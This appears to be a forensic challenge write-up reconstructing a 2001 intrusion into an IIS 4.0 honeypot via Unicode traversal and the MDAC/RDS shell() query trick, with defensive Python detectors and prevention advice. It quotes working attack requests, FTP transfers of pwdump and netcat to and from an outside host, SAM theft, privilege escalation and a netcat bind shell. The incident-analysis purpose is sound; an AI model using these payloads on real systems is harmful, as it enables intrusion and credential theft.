Answers for scan 14


Tools Used to Analyze

  • Notepad for Windows and TextEdit for X-Windows. 
  • HexEdit for X-Windows; XVI32 was the hex editor of choice.

Which exploits were used to attack the system?

  • Extended Unicode Directory Traversal; Unicode Exploit
  • MDAC - RDS exploit
  • MSADC.PL was probably used to help with the above exploits --  !ADM!ROX!YOUR!WORLD! is the MIME separator string for this Perl script.
  • Windows NT FTP with the -s: option made FTP transfer trivial.

How were the exploits used to access and control the system?

  • Used the MSADC virtual directory path (one of many IIS defaults) with the Unicode exploit to reach \winnt\system32 and execute shell commands via cmd.exe.  One reason to remove all virtual directories that are installed by default.
  • Used the RDS exploit (msadcs.dll, the AdvancedDataFactory interface) to execute shell commands on the server: the command is embedded in a |shell("...")| clause inside the RDS query string and is run by the Jet engine when the query is evaluated.  The same channel was used to remotely upload/download files.
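As an added illustration (not part of the original scan write-up), the Python below models the ordering bug behind the ..%c0%af.. requests: the server checked the still-encoded path for ".." segments and only then decoded it, using a decoder that accepted overlong UTF-8, so %c0%af became "/" after the check had already passed. Both the vulnerable and the hardened check are my own simplified models, not IIS code; the web root and the virtual-directory mapping are not modelled, only path depth.

```python
"""Unicode (overlong UTF-8) directory traversal: vulnerable vs. hardened check.

Added example; models the check-then-decode ordering bug, not real IIS code.
"""
from urllib.parse import unquote_to_bytes

# Request actually seen in this scan (before cmd.exe was copied to cmd1.exe).
TRAVERSAL = "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe"


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 without rejecting overlong 2-byte forms.

    A correct decoder refuses C0 AF (an illegal 2-byte spelling of '/') and
    C1 9C (of '\\'); a permissive one maps them to the path separators.
    Only 1- and 2-byte sequences are handled, which is all the trick needs.
    """
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            # No overlong check: C0 AF -> 0x2F ('/'), C1 9C -> 0x5C ('\').
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError(f"unsupported byte {b:#x} at offset {i}")
    return "".join(out)


def vulnerable_is_safe(raw_path: str) -> bool:
    """The flawed order: inspect the still-encoded path for '..' segments.

    '..%c0%af..' is one opaque segment here, so nothing looks like traversal.
    """
    return all(seg != ".." for seg in raw_path.replace("\\", "/").split("/"))


def vulnerable_resolve(raw_path: str) -> str:
    """What the server ends up opening after the late, permissive decode."""
    return lenient_utf8_decode(unquote_to_bytes(raw_path))


def hardened_is_safe(raw_path: str) -> bool:
    """Decode first, strictly (overlong forms are rejected outright), then
    normalise segments and refuse anything that climbs above the root."""
    try:
        text = unquote_to_bytes(raw_path).decode("utf-8")  # raises on C0 AF
    except UnicodeDecodeError:
        return False
    depth = 0
    for seg in text.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return False
        else:
            depth += 1
    return True


if __name__ == "__main__":
    print("raw-path check passes:", vulnerable_is_safe(TRAVERSAL))
    print("server actually resolves:", vulnerable_resolve(TRAVERSAL))
    print("hardened check passes:", hardened_is_safe(TRAVERSAL))
```

Each `..%c0%af../` collapses to `../../` after the permissive decode, so the three of them climb six levels from the msadc directory, which is why the request lands on c:\winnt\system32\cmd.exe. Decoding exactly once, strictly, before any path check removes the whole class.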

What was done once access was gained?

Note: The hacker made several typing errors, which produced redundant or syntactically incorrect commands; those are, I hope, left out of this analysis.  The main problem I saw was getting the correct case for the Unicode exploit, which turned out to be lowercase (../..%c0%af../..).  Using *NIX vs. DOS commands also added to this problem.

 

Most likely used MSADC.PL

GET /msadc/msadcs.dll HTTP/1.0 ----------------------------> Is the target vulnerable?   msadc.pl uses HTTP/1.0 for this GET and 1.1 for the POST; the attacker's own hand-typed GET requests use 1.1.

HTTP/1.1 200 OK                                     -------------------------------> Yes!
Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 12:43:21 GMT
Content-Type: application/x-varg
Content-Length: 6

POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1  ----------------------> Is RDS available/working?
User-Agent: ACTIVEDATA                                     -----------------------> Yes! (the User-Agent and ADCClientVersion below are what msadc.pl sends)
Host: lab.wiretrip.net
Content-Length: 645
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3 -------> msadc.pl MIME boundary.

--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: 436

 

Test RDS by creating a file called fun containing the text werd.  The query is carried in the VARG body as UTF-16LE, which is why the captured strings read letter-spaced (S e l e c t * f r o m ...) when viewed as ASCII; they are shown collapsed here:

Select * from Customers where City='|shell("cmd /c echo werd >> c:\fun")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

GET /guest/default.asp/..%c0%af../..%c0%af../..%c0%af../fun HTTP/1.1 -------------------------------------------> view the fun file
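The RDS request above is easy to recognise on the wire, and the shell() command can be pulled straight out of the body. The following is an added example (not code from the original write-up or from msadc.pl) that does both: the query travels as UTF-16LE inside the application/x-varg part, so the extractor searches for the UTF-16LE spelling of |shell("...")| rather than for ASCII. The multipart wrapper in the sample body is a simplified, constructed stand-in for the real VARG framing, which is not reproduced.

```python
"""Pull the shell() command out of an RDS (msadcs.dll) query body.

Added example.  The query inside the VARG body is UTF-16LE, which is why it
shows up as "S e l e c t * f r o m ..." when read as ASCII.  The sample body
below is constructed; the binary VARG framing is not reproduced.
"""
import re

MSADC_PL_BOUNDARY = b"!ADM!ROX!YOUR!WORLD!"


def _u16(s: str) -> bytes:
    """UTF-16LE spelling of a literal, escaped for use in a bytes regex."""
    return re.escape(s.encode("utf-16-le"))


# |shell("...")| and dbq=...; as they appear in the UTF-16LE query text.
SHELL_RE = re.compile(_u16('|shell("') + b"(.*?)" + _u16('")|'), re.DOTALL)
DBQ_RE = re.compile(_u16("dbq=") + b"(.*?)" + _u16(";"), re.DOTALL)


def extract_shell_commands(body: bytes) -> list:
    """Every command wrapped in |shell("...")| in the POST body, decoded."""
    return [m.group(1).decode("utf-16-le", "replace") for m in SHELL_RE.finditer(body)]


def extract_dbq(body: bytes) -> list:
    """The .mdb file(s) the query points at (a sample database, in this scan)."""
    return [m.group(1).decode("utf-16-le", "replace") for m in DBQ_RE.finditer(body)]


def rds_indicators(method: str, path: str, headers: dict, body: bytes) -> list:
    """Cheap, high-signal checks a proxy or IDS could run on one request."""
    found = []
    p = path.lower()
    if p.endswith("/msadc/msadcs.dll"):
        found.append("msadcs.dll probe")
    if "advanceddatafactory.query" in p:
        found.append("RDS AdvancedDataFactory.Query call")
    if headers.get("user-agent", "").upper() == "ACTIVEDATA":
        found.append("ACTIVEDATA user agent")
    if MSADC_PL_BOUNDARY in body:
        found.append("msadc.pl MIME boundary")
    for cmd in extract_shell_commands(body):
        found.append("shell(): " + cmd)
    return found


# Constructed sample: the "fun" test query from this scan, UTF-16LE encoded,
# inside a simplified msadc.pl-style multipart wrapper.
QUERY = (
    "Select * from Customers where City='|shell(\"cmd /c echo werd >> c:\\fun\")|' "
    "driver={Microsoft Access Driver (*.mdb)};"
    "dbq=c:\\winnt\\help\\iis\\htm\\tutorial\\btcustmr.mdb;"
)
SAMPLE_BODY = (
    b"--" + MSADC_PL_BOUNDARY + b"\r\n"
    b"Content-Type: application/x-varg\r\n\r\n"
    + QUERY.encode("utf-16-le")
    + b"\r\n--" + MSADC_PL_BOUNDARY + b"--\r\n"
)
SAMPLE_HEADERS = {"user-agent": "ACTIVEDATA", "host": "lab.wiretrip.net"}

if __name__ == "__main__":
    for line in rds_indicators("POST", "/msadc/msadcs.dll/AdvancedDataFactory.Query",
                               SAMPLE_HEADERS, SAMPLE_BODY):
        print(line)
```

An ASCII-only signature for `shell(` would miss this traffic entirely; matching on the UTF-16LE bytes (or decoding the body first) is what makes the command visible.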

Copy Some Server Files

Move CMD.EXE

GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1 ---> Copy cmd.exe, as cmd1.exe, into the directory the attacker will be working from (the msadc directory the request is served from; later requests call it from there).

Rename Default.htm

copy default.htm default.html  --------------------------------------------------------> keeps a copy so that an own version of default.htm can be uploaded later.

Rewrite the default.htm file?  Usually some type of defacement would occur here.

echo . >>default.htm ------------------> Attempt to overwrite default.htm with a single "."?  It did not work because the attacker used the append operator (>>), which only adds a line to the end of the file.

A visitor from 213.46.45.28 requested default.htm with an HTTP/1.0 GET just as the echo command was issued and got the current page.  The attacker then issued GET / with HTTP/1.1 and got the same page except for the "." appended after the </HTML> tag, which has no visible effect.

Need some Hacking tools

Attacker successfully placed 3 files on the server from his/her FTP site:

pdump.exe --- I assume this is pwdump.exe because of the samdump.dll file also uploaded.  The directory listing shows 32,768 bytes, which is the size of pwdump2 (actually the second release of pwdump2, which uses a new API call so the user does not need to pass the lsass.exe PID).

nc.exe (Netcat) --- general-purpose TCP/UDP tool; used here as a bind shell rather than a port redirector (see the nc -l -p 6969 -e cmd1.exe command below).

samdump.dll --- the DLL that pwdump2 injects into lsass.exe to read the password hashes.

Hacker had to try several times to compose correct FTP strings via echo commands redirected to a file.

The following files were created through a series of echo commands to send to the FTP program for automated execution.

  • SASFILE

  • FTPCOM

  • FTPCOM2

Using ftp with the -s:filename option executes the commands in the file allowing for easy FTP access.

Upload/Download of files via FTP

Uploaded nc.exe, pdump.exe and samdump.dll to the web server.

FTP Execution String via RDS:

Select * from Customers where City='|shell("cmd /c ftp -s:ftpcom -n www.nether.net")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

220 freenet.nether.net FTP server (SunOS 5.7) ready. -----------------------> The FTP attempt to this site using the ftpcom file did not work: incorrect login.

Attacker tried several RDS query strings without success.

Working FTP execution string:

GET /msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1

220-Serv-U FTP-Server v2.5h for WinSock ready...

220--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------
USER johna2k
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,71
200 PORT Command successful.
150 Opening ASCII mode data connection for nc.exe (59392 bytes).
150 Opening ASCII mode data connection for pdump.exe (32768 bytes).
150 Opening ASCII mode data connection for samdump.dll (36864 bytes).
226 Transfer complete. -----------------------> one per transfer; the repeats are omitted here
221 Buh bye, you secksi hax0r j00

Sent whisker.tar.gz from the web server to the attacker's FTP site (STOR, i.e. an upload from the client's side):

GET /msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1

220-Serv-U FTP-Server v2.5h for WinSock ready...

220--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------

USER johna2k 
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,87
200 PORT Command successful.
STOR whisker.tar.gz
150 Opening ASCII mode data connection for whisker.tar.gz.
226 Transfer complete.
221 Buh bye, you secksi hax0r j00

Need to find some accounts and passwords

Tried to enumerate users and passwords with Password Dump (pdump.exe)

Using the RDS exploit, embedded the following command in a query string:  pdump.exe >> c:\yay.txt

Select * from Customers where City='|shell("cmd /c C:\Program Files\Common Files\system\msadc\pdump.exe >> c:\yay.txt")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

c:\>dir  ----------------------------------------------> did it work?

Volume in drive C has no label.
Volume Serial Number is 8403-6A0E

Directory of C:\

11/26/00 12:34p 0 AUTOEXEC.BAT
11/26/00 06:57p 322 boot.ini
11/26/00 12:34p 0 CONFIG.SYS
12/26/00 07:36p <DIR> exploits
02/04/01 06:26a 7 fun
12/07/00 03:30p <DIR> InetPub
12/07/00 03:12p <DIR> Multimedia Files
12/26/00 07:10p <DIR> New Folder
01/26/01 02:10p 78,643,200 pagefile.sys
12/21/00 08:59p <DIR> Program Files
12/21/00 08:59p <DIR> TEMP
02/04/01 06:42a <DIR> WINNT
12/26/00 07:09p <DIR> wiretrip
02/04/01 06:43a 0 yay.txt -----------------------------------------------------------> did not work, no data (likely because the unquoted path contains spaces, so cmd tried to run "C:\Program" rather than pdump.exe; the redirection still created the empty file).
14 File(s) 78,643,529 bytes
1,690,861,056 bytes free

c:\>cat yay -------------------------------------------------------------------------------> not a *NIX box; need to use the DOS TYPE command
The name specified is not recognized as an
internal or external command, operable program or batch file.

c:\>type yay  -----------------------------------------------------------------------------> needs the .txt extension
The system cannot find the file specified.

Executed the NET USER command to list user accounts on the server from the command line.

Ran an RDS query to store the NET SESSION output in the text file yay2.txt.

02/04/01 06:46a 38 yay2.txt ---------------------------------------------------------> 38 bytes: the size of the standard "no entries" message

type yay2.txt -- resulted in no entries in the list

c:\>del yay2.txt -- attempt to delete the yay2 file

Ran net session from the command line into yay3.txt ----------------------------------------> access denied: the rights of the account the traversal commands run under do not allow it, so RDS has to be used.

del yay3.txt -- attempt to delete the yay3 file

Enumerate users on the server via Net Users command and RDS.

Select * from Customers where City='|shell("cmd /c net users >> heh.txt")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

type heh.txt

User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest IUSR_KENNY 
IWAM_KENNY 
The command completed with one or more errors.

Attacker now knows what accounts are on the system.

The attacker now tries adding the IIS default accounts to the Administrators group.

NET GROUP command: tried several times with the wrong syntax.

Why the IWAM account???  (The first attempt below names IUSR_KENNY, yet both IUSR_KENNY and IWAM_KENNY end up in the group.)

Select * from Customers where City='|shell("cmd /c net localgroup Domain Admins IUSR_KENNY /ADD")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

IUSR account!!!

Select * from Customers where City='|shell("cmd /c net localgroup administrators IUSR_KENNY /ADD")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

NET LOCALGROUP administrators -- lists the members of the group.  Was the attacker successful?  Yes:

Alias name administrators
Comment Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator Domain Admins IUSR_KENNY 
IWAM_KENNY 

The command completed successfully.

 

Time to try enumerating users and passwords from the SAM

type sam._
Access is denied.

Select * from Customers where City='|shell("cmd /c rdisk -s")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

Select * from Customers where City='|shell("cmd /c rdisk")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

Quit trying to create a repair disk on the local drive -- $$hive$$.tmp is now over 3MB.  (rdisk /s copies the current SAM and SECURITY hives into %systemroot%\repair; sam._ there is the compressed SAM, and that is what the attacker goes after next.)

Select * from Customers where City='|shell("cmd /c type c:\winnt\repair\sam._ >> c:\har.txt")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

Volume in drive C has no label.
Volume Serial Number is 8403-6A0E

Directory of C:\

11/26/00 12:34p 0 AUTOEXEC.BAT
11/26/00 06:57p 322 boot.ini
11/26/00 12:34p 0 CONFIG.SYS
12/26/00 07:36p <DIR> exploits
02/04/01 07:07a 5,327 har.txt -------------------------------------------------------------> I've got a copy of the SAM
12/07/00 03:30p <DIR> InetPub
12/07/00 03:12p <DIR> Multimedia Files
12/26/00 07:10p <DIR> New Folder
01/26/01 02:10p 78,643,200 pagefile.sys
12/21/00 08:59p <DIR> Program Files
02/04/01 06:49a 69 README.NOW.Hax0r
12/21/00 08:59p <DIR> TEMP
02/04/01 07:05a <DIR> WINNT
12/26/00 07:09p <DIR> wiretrip
02/04/01 06:43a 0 yay.txt
15 File(s) 78,648,918 bytes
1,689,455,616 bytes free

Executed type har.txt; it was an actual SAM file.  The ASCII view showed the standard MSFC code at the beginning of the file.

copied har.txt to c:\inetpub\wwwroot.

Executed GET /har.txt HTTP/1.1 -- an easy way to pull the file to the attacker's machine and run a password cracker against it.

Server: Microsoft-IIS/4.0
Date: Sun, 04 Feb 2001 13:11:28 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Sun, 04 Feb 2001 13:07:33 GMT
ETag: "5063fd6fab8ec01:b85"
Content-Length: 5327 ---------------------------------------> Same length as har.txt in the directory listing.

Tried to delete the file har.txt.  No success through the exploited command line, so the deletion was issued via RDS:

Select * from Customers where City='|shell("cmd /c del c:\inetpub\wwwroot\har.txt")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

Install Netcat (nc.exe)

  • GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1
  • The first few attempts used UPPERCASE %C0%AF and failed.
  • GET /msadc/..%c0%af../..%c0%af../..%c0%af../program files/common files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1
  • This starts nc listening on TCP port 6969 and, on a successful connection, hands the remote client a command shell (a bind shell):
  • -l -- listen for an inbound connection
  • -p -- the port to listen on (6969)
  • -e -- the program to attach to the connection (cmd1.exe, the attacker's copy of cmd.exe)
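The request lines quoted throughout this analysis can be turned into an attacker timeline mechanically. As an added example (not part of the original write-up), the Python below classifies each captured request line: it flags overlong-UTF-8 traversal (%c0%af, %c1%9c) and plain ../ traversal, recovers the command that cmd.exe/cmd1.exe actually ran from the '+'-separated query, and spots a netcat listener. The sample lines are constructed from the requests shown on this page; their order is an assumption, and the same logic applies to the cs-uri-stem and cs-uri-query fields of an IIS log.

```python
"""Reconstruct the attacker's command chain from captured request lines.

Added example.  Sample lines are constructed from the requests quoted in this
analysis; nothing here is IIS or msadc.pl code.
"""
import re
from urllib.parse import unquote_plus

# Overlong UTF-8 spellings of '/' and '\' used by the Unicode traversal bug.
OVERLONG_RE = re.compile(r"%c0%af|%c1%9c", re.IGNORECASE)
# Lazy URL match so that unencoded spaces in the path (seen in this scan) still parse.
REQ_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<url>.+?)\s+HTTP/(?P<ver>[\d.]+)$")
NC_LISTEN_RE = re.compile(
    r"\bnc(?:\.exe)?\b.*\s-l\b.*\s-p\s+(?P<port>\d+).*\s-e\s+(?P<prog>\S+)"
)


def analyse_request(line: str) -> dict:
    """Classify one request line; returns what was found in it."""
    m = REQ_RE.match(line.strip())
    if not m:
        return {"raw": line, "error": "not a request line"}
    url = m.group("url")
    stem, _, query = url.partition("?")
    info = {
        "method": m.group("method"),
        "stem": stem,
        "overlong": bool(OVERLONG_RE.search(stem)),
        "traversal": ".." in stem,
        "command": None,
        "netcat": None,
    }
    exe = stem.rsplit("/", 1)[-1].lower()
    if exe in ("cmd.exe", "cmd1.exe") and query:
        # IIS passes "?/c+dir" to the executable as "/c dir": '+' is a space.
        cmd = unquote_plus(query)
        info["command"] = cmd
        nc = NC_LISTEN_RE.search(cmd)
        if nc:
            info["netcat"] = {"port": int(nc.group("port")), "program": nc.group("prog")}
    return info


def timeline(lines) -> list:
    """One short line per request, in order, for the analyst's notes."""
    out = []
    for line in lines:
        r = analyse_request(line)
        if "error" in r:
            out.append(f"?? {line.strip()}")
            continue
        tags = []
        if r["overlong"]:
            tags.append("unicode-traversal")
        elif r["traversal"]:
            tags.append("plain-traversal")
        if r["netcat"]:
            tags.append(f"bind-shell:{r['netcat']['port']}")
        what = r["command"] or r["stem"]
        out.append(f"{r['method']} [{', '.join(tags) or '-'}] {what}")
    return out


# Constructed from the requests quoted in this analysis (order assumed).
SAMPLE = [
    "GET /msadc/msadcs.dll HTTP/1.0",
    "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe"
    "?/c+copy+C:\\winnt\\system32\\cmd.exe+cmd1.exe HTTP/1.1",
    "GET /guest/default.asp/..%c0%af../..%c0%af../..%c0%af../fun HTTP/1.1",
    "GET /msadc/../../../../../../program files/common files/system/msadc/cmd1.exe"
    "?/c+ftp+-s:ftpcom HTTP/1.1",
    "GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/"
    "system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1",
]

if __name__ == "__main__":
    print("\n".join(timeline(SAMPLE)))
```

Matching the overlong sequences case-insensitively matters for triage even though only the lowercase form worked against this server: the failed uppercase attempts are still evidence of the same attacker.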

Miscellaneous Events

  • Listed services with NET START.  The following Windows NT services were running:
  • Alerter
  • Computer Browser
  • EventLog
  • FTP Publishing Service
  • IIS Admin Service
  • License Logging Service
  • Messenger
  • MSDTC
  • Net Logon
  • NT LM Security Support Provider
  • Plug and Play
  • Protected Storage
  • Remote Procedure Call (RPC) Locator
  • Remote Procedure Call (RPC) Service
  • Server
  • Spooler
  • TCP/IP NetBIOS Helper
  • Workstation
  • World Wide Web Publishing Service
  • (The command completed successfully.)

  • The attacker leaves a message in a file with the following command:  echo Hi, i know that this a is a lab server, but patch the holes! :-) >>README.NOW.Hax0r

How could this attack have been prevented?

  • Delete \Program Files\Common Files\System\Msadc\msadcs.dll if RDS is not used.  Without it the AdvancedDataFactory interface, and with it the |shell("...")| trick, is simply not reachable.
  • Patch the system.  Both holes used here were publicly known and fixed well before this attack (the RDS/MSADC issue in July 1999, the Unicode "Web Server Folder Traversal" bug in October 2000).  IIS patches and alerts are released constantly; subscribe to the vendor and security mailing lists for current information.
  • Remove all sample files from any live server.  Sample files are not known for their security, and every RDS query in this attack points at one of them (c:\winnt\help\iis\htm\tutorial\btcustmr.mdb).
  • Remove the virtual directories created by default if not needed.  Unless you are using database back-ends or remote administration, you can eliminate all default virtual directories.
  • Place the root directories (wwwroot and ftproot) on a separate drive/partition from the system directories, so that ../ traversal from the web tree cannot reach \winnt\system32.
  • Set restrictive ACLs on, and relocate, critical files such as cmd.exe and the contents of \winnt\repair.  Moving them is security through obscurity; the ACLs are not.
  • http://www.attrition.org/security/advisory/rfp/rfp.9907.msadcs -- all you ever wanted to know about the RDS exploit.

How much time did you spend on this analysis and write-up?

15-20 Hours

Do you feel the attacker in question knew if this was a honeypot?

Yes; echo best honeypot i've seen till now :) > rfp.txt